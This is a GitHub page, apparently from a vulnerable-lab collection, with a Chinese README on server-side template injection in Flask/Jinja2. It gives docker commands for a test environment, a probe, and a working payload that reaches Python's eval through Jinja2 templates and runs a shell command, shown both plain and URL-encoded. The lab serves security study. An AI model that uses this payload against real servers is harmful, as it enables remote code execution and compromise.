Skip to content
Branch: master
Find file History

Latest commit

Latest commit 81d71dd Nov 22, 2019

Files

Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
src
1.png [ImgBot] optimizes images Sep 1, 2018
README.md change the second url Nov 28, 2017
docker-compose.yml flask 1.1.1 Nov 21, 2019

README.md

Flask(Jinja2) 服务端模板注入漏洞

原理

参考文章:

测试

编译及运行测试环境:

docker-compose build
docker-compose up -d

访问http://your-ip/?name={{233*233}},得到54289,说明SSTI漏洞存在。

获取eval函数并执行任意python代码的POC:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

访问http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D,得到执行结果:

You can’t perform that action at this time.